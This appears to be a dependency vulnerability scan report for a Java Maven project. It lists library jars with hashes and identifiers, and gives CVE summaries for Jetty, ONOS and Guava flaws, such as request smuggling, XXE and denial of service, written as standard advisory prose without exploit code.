Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) <x:parse> or (2) <x:transform> JSTL XML tag.

Vulnerable Software & Versions:

apache-jstl-9.2.15.v20160210.jar

File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/apache-jstl/9.2.15.v20160210/apache-jstl-9.2.15.v20160210.jar
MD5: 9db9288aa58d4e0a1d63a37fd400c077
SHA1: c4d2ca2cdb2894a766afd6405c2843c4444e4e56
SHA256:6723e9340ae5a91a8446cd3ddae366b0dae12e31e85f6027be41f17ab68eadaa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty:apache-jstl:9.2.15.v20160210  Confidence:Highest
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:9.2.15.v20160210  Confidence:Low  

websocket-common-9.2.15.v20160210.jar

Description:

 Administrative parent pom for Jetty modules

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/websocket/websocket-common/9.2.15.v20160210/websocket-common-9.2.15.v20160210.jar
MD5: d02f4478984ab4b3653e446172d95ac3
SHA1: ee5616ec65d6c8f05fe16ee4dbb6723b2ebff470
SHA256:5caae59182ebf39ebe6ba41c1ddf713787e0ce1d4300c1f6623e5b1f245ec453
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.websocket:websocket-common:9.2.15.v20160210  Confidence:Highest
  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions: (show all)

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions: (show all)

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions: (show all)

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

websocket-api-9.2.15.v20160210.jar

Description:

 Administrative parent pom for Jetty modules

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/websocket/websocket-api/9.2.15.v20160210/websocket-api-9.2.15.v20160210.jar
MD5: ed9937a137a90d8e49fa1c71b0db6346
SHA1: f0340017129a65097824dd62a04b3c887f397dd9
SHA256:2ad5ab7d46a22e9f50987dcb59da0d9ebbc353359f724c66cb06bc13fb6df1c6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.websocket:websocket-api:9.2.15.v20160210  Confidence:Highest

javax.websocket-api-1.1.jar

Description:

 JSR 356: Java API for WebSocket

License:

https://glassfish.java.net/public/CDDL+GPL_1_1.html
File Path: /Users/Kevin/.m2/repository/javax/websocket/javax.websocket-api/1.1/javax.websocket-api-1.1.jar
MD5: be29e11a4a15742aa6fb418fa46345e3
SHA1: eeeb68631711256418dfbb47b11c731b6c8f6235
SHA256:a260973517bf6411d659b588a719aa27e7e4e47dfbd510fceb5bf1023a2c45e4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.websocket:javax.websocket-api:1.1  Confidence:Highest

javax-websocket-server-impl-9.2.15.v20160210.jar

Description:

 javax.websocket.server Implementation

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/websocket/javax-websocket-server-impl/9.2.15.v20160210/javax-websocket-server-impl-9.2.15.v20160210.jar
MD5: 7aae20354f7e514198ef77fea3e5279f
SHA1: 241e7f1fc7fa6ba305f5a268cbe1faf7d12858fd
SHA256:b15394d96713ffd7e22d6d04a2ba1a1b06a732fafab46c117818e7eda9c442a0
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  
  • maven: org.eclipse.jetty.websocket:javax-websocket-server-impl:9.2.15.v20160210  Confidence:Highest

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions: (show all)

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions: (show all)

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions: (show all)

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

onos-core-dist-1.13.1.jar

File Path: /Users/Kevin/.m2/repository/org/onosproject/onos-core-dist/1.13.1/onos-core-dist-1.13.1.jar
MD5: 3fd21200cb9531fabcba49cabc70d4b6
SHA1: 73731679c242852f1763125c23e81bcd68796d6b
SHA256:263593273d2497a54eb722bdfb481771dfe60f941de5938c6065240d5c129889
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2018-1000614  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS ONOS Controller version 1.13.1 and earlier contains a XML External Entity (XXE) vulnerability in providers/netconf/alarm/src/main/java/org/onosproject/provider/netconf/alarm/NetconfAlarmTranslator.java that can result in An adversary can remotely launch advanced XXE attacks on ONOS controller without authentication.. This attack appear to be exploitable via crafted protocol message.

Vulnerable Software & Versions:

CVE-2018-1000615  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

ONOS ONOS Controller version 1.13.1 and earlier contains a Denial of Service (Service crash) vulnerability in OVSDB component in ONOS that can result in An adversary can remotely crash OVSDB service ONOS controller via a normal switch.. This attack appear to be exploitable via the attacker should be able to control or forge a switch in the network..

Vulnerable Software & Versions:

CVE-2018-1000616  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS ONOS controller version 1.13.1 and earlier contains a XML External Entity (XXE) vulnerability in onos\drivers\utilities\src\main\java\org\onosproject\drivers\utilities\XmlConfigParser.java loadxml() that can result in An adversary can remotely launch XXE attacks on ONOS controller via an OpenConfig Terminal Device.. This attack appear to be exploitable via network connectivity.

Vulnerable Software & Versions:

asm-5.0.4.jar

File Path: /Users/Kevin/.m2/repository/org/ow2/asm/asm/5.0.4/asm-5.0.4.jar
MD5: c8a73cdfdf802ab0220c860d590d0f84
SHA1: 0da08b8cce7bbf903602a25a3a163ae252435795
SHA256:896618ed8ae62702521a78bc7be42b7c491a08e6920a15f89a3ecdec31e9a220
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.ow2.asm:asm:5.0.4  Confidence:Highest

commons-collections-3.2.2.jar

Description:

 Types that extend and augment the Java Collections Framework.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar
MD5: f54a8510f834a1a57166970bfc982e94
SHA1: 8ad72fe39fa8c91eaaf12aadb21e0c3661fe26d5
SHA256:eeeae917917144a68a741d4c0dff66aa5c5c5fd85593ff217bced3fc8ca783b8
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:commons_collections:3.2.2  Confidence:Low  
  • maven: commons-collections:commons-collections:3.2.2  Confidence:Highest

commons-configuration-1.10.jar

Description:

 Tools to assist in the reading of configuration/preferences files in various formats.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-configuration/commons-configuration/1.10/commons-configuration-1.10.jar
MD5: b16511ce540fefd53981245f5f21c5f8
SHA1: 2b36e4adfb66d966c5aef2d73deb6be716389dc9
SHA256:95d4e6711e88ce78992c82c25bc03c8df9ecf5a357f0de0bec72a26db3399374
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-configuration:commons-configuration:1.10  Confidence:Highest

commons-lang3-3.6.jar

Description:

 
  Apache Commons Lang, a package of Java utility classes for the
  classes that are in java.lang's hierarchy, or are considered to be so
  standard as to justify existence in java.lang.
  

License:

https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-lang3/3.6/commons-lang3-3.6.jar
MD5: 5d18f68b5122fd398c118df53ab4cf55
SHA1: 9d28a6b23650e8a7e9063c04588ace6cf7012c17
SHA256:89c27f03fff18d0b06e7afd7ef25e209766df95b6c1269d6c3ebbdea48d5f284
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-lang3:3.6  Confidence:Highest

commons-logging-1.2.jar

Description:

 Apache Commons Logging is a thin adapter allowing configurable bridging to other,
    well known logging systems.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
MD5: 040b4b4d8eac886f6b4a2a3bd2f31b00
SHA1: 4bfc12adfe4842bf07b657f0369c4cb522955686
SHA256:daddea1ea0be0f56978ab3006b8ac92834afeefbd9b7e4e6316fca57df0fa636
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-logging:commons-logging:1.2  Confidence:Highest

commons-math3-3.6.1.jar

Description:

 The Apache Commons Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-math3/3.6.1/commons-math3-3.6.1.jar
MD5: 5b730d97e4e6368069de1983937c508e
SHA1: e4ba98f1d4b3c80ec46392f25e094a6a2e58fcbf
SHA256:1e56d7b058d28b65abd256b8458e3885b674c1d588fa43cd7d1cbb9c7ef2b308
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-math3:3.6.1  Confidence:Highest

commons-pool-1.6.jar

Description:

 Commons Object Pooling Library

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-pool/commons-pool/1.6/commons-pool-1.6.jar
MD5: 5ca02245c829422176d23fa530e919cc
SHA1: 4572d589699f09d866a226a14b7f4323c6d8f040
SHA256:46c42b4a38dc6b2db53a9ee5c92c63db103665d56694e2cfce2c95d51a6860cc
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-pool:commons-pool:1.6  Confidence:Highest

concurrent-trees-2.6.1.jar

Description:

 Concurrent Radix Trees and Concurrent Suffix Trees for Java.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.jar
MD5: 61170474fb5c73f668d786b972c2040e
SHA1: 9b647240522ab67c003de9b6702ca81ac0c15efc
SHA256:04e3724984e2a5cbf55606cfa372a5bd3d3c5d2a21533a7004e3cde539761fa5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.googlecode.concurrent-trees:concurrent-trees:2.6.1  Confidence:Highest

error_prone_annotations-2.0.18.jar

File Path: /Users/Kevin/.m2/repository/com/google/errorprone/error_prone_annotations/2.0.18/error_prone_annotations-2.0.18.jar
MD5: 98051758c08c9b7111b3268655069432
SHA1: 5f65affce1684999e2f4024983835efc3504012e
SHA256:cb4cfad870bf563a07199f3ebea5763f0dec440fcda0b318640b1feaa788656b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.errorprone:error_prone_annotations:2.0.18  Confidence:Highest

j2objc-annotations-1.1.jar

Description:

 
    A set of annotations that provide additional information to the J2ObjC
    translator to modify the result of translation.
  

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/google/j2objc/j2objc-annotations/1.1/j2objc-annotations-1.1.jar
MD5: 49ae3204bb0bb9b2ac77062641f4a6d7
SHA1: ed28ded51a8b1c6b112568def5f4b455e6809019
SHA256:2994a7eb78f2710bd3d3bfb639b2c94e219cedac0d4d084d516e78c16dddecf6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.j2objc:j2objc-annotations:1.1  Confidence:Highest

animal-sniffer-annotations-1.14.jar

File Path: /Users/Kevin/.m2/repository/org/codehaus/mojo/animal-sniffer-annotations/1.14/animal-sniffer-annotations-1.14.jar
MD5: 9d42e46845c874f1710a9f6a741f6c14
SHA1: 775b7e22fb10026eed3f86e8dc556dfafe35f2d5
SHA256:2068320bd6bad744c3673ab048f67e30bef8f518996fa380033556600669905d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.mojo:animal-sniffer-annotations:1.14  Confidence:Highest

guava-22.0.jar

Description:

 
    Guava is a suite of core and expanded libraries that include
    utility classes, google's collections, io classes, and much
    much more.

    Guava has only one code dependency - javax.annotation,
    per the JSR-305 spec.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/google/guava/guava/22.0/guava-22.0.jar
MD5: 5ba5b28f59ed2d96534ece0a72802db6
SHA1: 3564ef3803de51fb0530a8377ec6100b33b0d073
SHA256:1158e94c7de4da480873f0b4ab4a1da14c0d23d4b1902cc94a58a6f0f9ab579e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.guava:guava:22.0  Confidence:Highest
  • cpe: cpe:/a:google:guava:22.0  Confidence:Highest  

CVE-2018-10237  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable.

Vulnerable Software & Versions: (show all)

jackson-core-2.9.5.jar

Description:

 Core Jackson processing abstractions (aka Streaming API), implementation for JSON

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.9.5/jackson-core-2.9.5.jar
MD5: ec59f24f7f8d9acf53301c562722adf2
SHA1: a22ac51016944b06fd9ffbc9541c6e7ce5eea117
SHA256:a2bebaa325ad25455b02149c67e6052367a7d7fc1ce77de000eed284a5214eac
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:2.9.5  Confidence:Low  
  • maven: com.fasterxml.jackson.core:jackson-core:2.9.5  Confidence:Highest

javax.ws.rs-api-2.1.jar

Description:

 Java API for RESTful Web Services (JAX-RS)

License:

CDDL 1.1: https://oss.oracle.com/licenses/CDDL+GPL-1.1
GPL2 w/ CPE: https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/javax/ws/rs/javax.ws.rs-api/2.1/javax.ws.rs-api-2.1.jar
MD5: 2f754caa430ca5a51a662d6aa821a152
SHA1: 426a0862406536e690c7caa8bb6ed32191986fac
SHA256:1a4295889416c6972addcd425dfeeee6e6ede110e8b2dc8b49044e9b400ad5db
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.ws.rs:javax.ws.rs-api:2.1  Confidence:Highest
  • cpe: cpe:/a:ws_project:ws:2.1  Confidence:Low  

osgi-resource-locator-1.0.1.jar

Description:

  See http://wiki.glassfish.java.net/Wiki.jsp?page=JdkSpiOsgi for more information

License:

https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/org/glassfish/hk2/osgi-resource-locator/1.0.1/osgi-resource-locator-1.0.1.jar
MD5: 51e70ad8fc9d1e9fb19debeb55555b75
SHA1: 4ed2b2d4738aed5786cfa64cba5a332779c4c708
SHA256:775003be577e8806f51b6e442be1033d83be2cb2207227b349be0bf16e6c0843
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.glassfish.hk2:osgi-resource-locator:1.0.1  Confidence:Highest

jersey-common-2.26.jar

Description:

 Jersey core common packages

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1, https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/core/jersey-common/2.26/jersey-common-2.26.jar
MD5: 2f5dd10b3063c4a4011ff5d55accf107
SHA1: d96475745c5e72cafcbc4dc9e2e725f4d9683f21
SHA256:bc0e95153bef81c44439d25a662168226b9adee94db27c1198f9777e382b1b17
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.glassfish.jersey.core:jersey-common:2.26  Confidence:Highest

jersey-client-2.26.jar

Description:

 Jersey core client implementation

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1, https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/core/jersey-client/2.26/jersey-client-2.26.jar
MD5: 4383747f111621f8f78ad34837169a23
SHA1: 125b8d1040d121a5dc4ce6858e21a6160bed7afa
SHA256:3e44b7db8691eb0b2a6751eda888150b9ba1092a5805f11e4727fd4904407a41
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.glassfish.jersey.core:jersey-client:2.26  Confidence:Highest

jersey-media-jaxb-2.26.jar

Description:

 
        JAX-RS features based upon JAX-B.
    

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1, https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/media/jersey-media-jaxb/2.26/jersey-media-jaxb-2.26.jar
MD5: 14426c1253795f56b48da8c9ffc42d8d
SHA1: 791397ceb5d1c8f389664b1de3e4208c2ac1015b
SHA256:b663ed76511f19c1c7312a1cca3e3c5e6e07973d9822d2539ab2a6fad57f99b4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.glassfish.jersey.media:jersey-media-jaxb:2.26  Confidence:Highest

javax.inject-2.5.0-b42.jar

Description:

 Injection API (JSR 330) version ${javax.inject.version} repackaged as OSGi bundle

License:

https://glassfish.java.net/nonav/public/CDDL+GPL_1_1.html
File Path: /Users/Kevin/.m2/repository/org/glassfish/hk2/external/javax.inject/2.5.0-b42/javax.inject-2.5.0-b42.jar
MD5: 70c06ad58ec733717d01efe7aa06d0dc
SHA1: 98e0b7dcef77dc04809f0603868140a1c60bea71
SHA256:3bcf096beb918c9586be829190903090a21ac40513c1401e1b986e6030addc98
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.glassfish.hk2.external:javax.inject:2.5.0-b42  Confidence:Highest

validation-api-1.1.0.Final.jar

Description:

 
        Bean Validation API
    

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/javax/validation/validation-api/1.1.0.Final/validation-api-1.1.0.Final.jar
MD5: 4c257f52462860b62ab3cdab45f53082
SHA1: 8613ae82954779d518631e05daa73a6a954817d5
SHA256:f39d7ba7253e35f5ac48081ec1bc28c5df9b32ac4b7db20853e5a8e76bf7b0ed
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.validation:validation-api:1.1.0.Final  Confidence:Highest

jersey-server-2.26.jar

Description:

 Jersey core server implementation

License:

https://oss.oracle.com/licenses/CDDL+GPL-1.1, https://oss.oracle.com/licenses/CDDL+GPL-1.1
File Path: /Users/Kevin/.m2/repository/org/glassfish/jersey/core/jersey-server/2.26/jersey-server-2.26.jar
MD5: 239161e246b3f54c77c461ee15d8065b
SHA1: aa8eff3d591641dadd7c9880bb73b59bf46d4c82
SHA256:d9f7a1e0d39267eb02c87046d205f2a90e38f2d2a3be885a619263f732a47935
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.glassfish.jersey.core:jersey-server:2.26  Confidence:Highest

jsr305-3.0.1.jar

Description:

 JSR305 Annotations for Findbugs

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/google/code/findbugs/jsr305/3.0.1/jsr305-3.0.1.jar
MD5: c6532beb3f7cc54a8d73d25d5602b9e4
SHA1: f7be08ec23c21485b9b5a1cf1654c2ec8c58168d
SHA256:c885ce34249682bc0236b4a7d56efcc12048e6135a5baf7a9cde8ad8cda13fcd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.google.code.findbugs:jsr305:3.0.1  Confidence:Highest

kryo-4.0.1.jar

Description:

 Fast, efficient Java serialization. This is the parent pom that assembles the main kryo and shaded kryo artifacts.

License:

3-Clause BSD License: https://opensource.org/licenses/BSD-3-Clause
File Path: /Users/Kevin/.m2/repository/com/esotericsoftware/kryo/4.0.1/kryo-4.0.1.jar
MD5: 654f6326f505c18d67e04c43c6ad6bef
SHA1: 5053899c213a6ce50a800d4902c5a9de49fe0098
SHA256:05da64250f6e6488cd79a2609887fd3b9db46c37cdc6daaba88a178632bf48f9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.esotericsoftware:kryo-parent:4.0.1  Confidence:High
  • maven: com.esotericsoftware:kryo:4.0.1  Confidence:Highest

metrics-core-3.2.2.jar

Description:

 
        Metrics is a Java library which gives you unparalleled insight into what your code does in
        production. Metrics provides a powerful toolkit of ways to measure the behavior of critical
        components in your production environment.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-core/3.2.2/metrics-core-3.2.2.jar
MD5: da529999d5083e800829eaab432a8a54
SHA1: cd9886f498ee2ab2d994f0c779e5553b2c450416
SHA256:5c6f685e41664d10c70c65837cba9e58d39ff3896811e3b5707a934b11c85ad0
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-core:3.2.2  Confidence:Highest

metrics-json-3.2.2.jar

Description:

 
        A set of Jackson modules which provide serializers for most Metrics classes.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-json/3.2.2/metrics-json-3.2.2.jar
MD5: ca842c88e0ef8bac7e674c145108fc0c
SHA1: 234612b9739a651eb2b71a8f9e9c4d11d7ccf849
SHA256:38f50ac1f211518279031919bbcc0e02f6d6659d02dcd6f4e47e90b16851c821
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-json:3.2.2  Confidence:Highest

minlog-1.3.0.jar

Description:

 Minimal overhead Java logging

License:

New BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/com/esotericsoftware/minlog/1.3.0/minlog-1.3.0.jar
MD5: 5ab0ee168b90e0ad7010b159e603d304
SHA1: ff07b5f1b01d2f92bb00a337f9a94873712f0827
SHA256:f7b399d3a5478a4f3e0d98bd1c9f47766119c66414bc33aa0f6cde0066f24cc2
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.esotericsoftware:minlog:1.3.0  Confidence:Highest

netty-3.10.5.Final.jar

Description:

 
    The Netty project is an effort to provide an asynchronous event-driven
    network application framework and tools for rapid development of
    maintainable high performance and high scalability protocol servers and
    clients.  In other words, Netty is a NIO client server framework which
    enables quick and easy development of network applications such as protocol
    servers and clients. It greatly simplifies and streamlines network
    programming such as TCP and UDP socket server.
  

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/io/netty/netty/3.10.5.Final/netty-3.10.5.Final.jar
MD5: 14466fef5f114f444c688f7977e9dbce
SHA1: 9ca7d55d246092bddd29b867706e2f6c7db701a0
SHA256:eb031acf8a00733481bcd60807925ecfc9ce3840f13823d4b96cdcb1132db1da
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.netty:netty:3.10.5.Final  Confidence:Highest
  • cpe: cpe:/a:netty_project:netty:3.10.5  Confidence:Low  

netty-transport-4.1.8.Final.jar

Description:

 Netty is an asynchronous event-driven network application framework for    rapid development of maintainable high performance protocol servers and    clients.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/io/netty/netty-transport/4.1.8.Final/netty-transport-4.1.8.Final.jar
MD5: 3d75a3e599aa9739e10a7aa191c3b00c
SHA1: 905b5dadce881c9824b3039c0df36dabbb7b6a07
SHA256:6581c964501166daeb62792edf2a1f1ad63e348dd02b9ab228efd8ed3cce2d4a
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.netty:netty-transport:4.1.8.Final  Confidence:Highest
  • cpe: cpe:/a:netty_project:netty:4.1.8  Confidence:Low  

objenesis-2.6.jar

Description:

 A library for instantiating Java objects

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/objenesis/objenesis/2.6/objenesis-2.6.jar
MD5: 5ffac3f51405ca9b2915970a224b3e8f
SHA1: 639033469776fd37c08358c6b92a4761feb2af4b
SHA256:5e168368fbc250af3c79aa5fef0c3467a2d64e5a7bd74005f25d8399aeb0708d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.objenesis:objenesis:2.6  Confidence:Highest

org.apache.felix.scr-1.8.2.jar

Description:

 
        Implementation of the Declarative Services specification 1.2
    

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/felix/org.apache.felix.scr/1.8.2/org.apache.felix.scr-1.8.2.jar
MD5: ce9db4e6958cbd7e555cec48fdcd35fc
SHA1: c3047d56ee57de0752821fd9c3894dda664f2e37
SHA256:19d395d8800d5546397211edc209e2e42d0ee500c93aca9d04ce69e4288f41d9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.felix:org.apache.felix.scr:1.8.2  Confidence:Highest

